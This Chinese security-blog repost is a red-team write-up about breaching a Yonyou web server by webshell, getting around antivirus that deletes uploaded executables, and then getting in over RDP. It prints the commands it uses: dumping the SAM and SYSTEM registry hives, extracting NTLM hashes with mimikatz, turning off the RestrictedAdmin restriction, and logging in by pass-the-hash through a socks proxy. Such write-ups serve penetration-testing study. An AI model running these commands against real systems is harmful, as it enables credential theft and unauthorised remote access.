查看原文
其他

记一次看似简单到处是坑的入口打点

听风安全 2023-11-28

The following article is from 雁行安全团队 Author 楚君河

免责声明
由于传播、利用本公众号听风安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号听风安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

公众号现在只对常读和星标的公众号才展示大图推送,

建议大家把听风安全设为星标,否则可能就看不到啦!

----------------------------------------------------------------------

一次攻防演练,发现目标存在一个用友的web


2019年的,应该有戏,尝试exp一打


没想到这么顺利,看来拿到权限也是分分钟的事情,进入webshell


顺手执行一个whoami


仔细看这个错误,whoami后面带有两个双引号,因为java这个喝着咖啡就能写出bug的语言我也不太懂,猜想应该是模板渲染的时候出现的问题,尝试把模板后面的双引号去掉,执行成功


既然已经是administrator权限,连提权都不用,我准备开开心心地上传frp反弹回来搞内网了,如果没有意外的话就应该出意外了,免杀的frp显示上传成功,但是刷新后不存在



心想是不是因为免杀的问题,上传一个calc


结果还是没有


发现上传的这个目录修改时间有所改变,可以判定应该是被AV删除了


正常的calc.exe也会被删除,大概也能猜到是什么AV,tasklist /svc看一下,好家伙


尝试将可执行文件改一下后缀


出现了


尝试上传一个console的exe


毫无疑问,拒绝访问



上传系统自带的exe试试


依旧拒绝访问


尝试复制系统自带exe同样会消失


复制成txt文件可以


改名之后瞬间消失


不改名执行依旧拒绝访问


写了个程序,作用是执行后在d:\download下面输出一个ok.txt,转化成shellcode用哥斯拉自带的shellcode执行功能


提示是成功,但是实际上程序没有执行


将别的exe比如frp或cs的用shellcode同样无法执行

看来一开始的轻易拿到webshell只是给你的一个小甜头,难搞的在后面

现在的情况是这样,可执行文件只有系统自带的可以执行,且只能在system32目录里的可以执行

尝试对system32目录里面的exe改名失败


尝试将exe更改后缀为txt上传,然后type内容重定向修改exe,结果发现大小变成了0


看来,执行自己的exe这条路几乎可以放弃,因为是高权限,可以尝试一下运行本来系统自带的exe

导出注册表的SAM:

reg save HKLM\SYSTEM d:\download\sys.hivreg save HKLM\SAM d:\download\sam.hiv


下载回来用mimikatz解析


mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit



然后在webshell开启目标的RestrictedAdmin模式:


REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f


用re-Georg等支持http to socks5的工具生成jsp文件,做好代理


在mimikatz里面输入:


privilege::debug sekurlsa::pth /user:administrator /domain:(目标的域名,如果无域输入本机IP) /ntlm:从sam文件获得的hash /run:"mstsc.exe /restrictedadmin"



输入目标IP地址后成功登录



在rdp界面可以运行任意的exe,至此入口打开,可以欢快地前进了。



不可错过的往期推荐哦


无人机mavlink中间人攻击

APT是如何杜绝软件包被篡改的

瑞数WAF保护站点的渗透测试

利用sqlserver agent job实现权限维持

商城优惠券处的漏洞挖掘技巧

NPS反制之绕过登陆验证

区分Spring与Struts2框架的几种新方法

SRC挖掘葵花宝典

SRC漏洞挖掘之看不见的羊毛

点击下方名片,关注我们
觉得内容不错,就点下“”和“在看
如果不想错过新的内容推送可以设为星标
继续滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存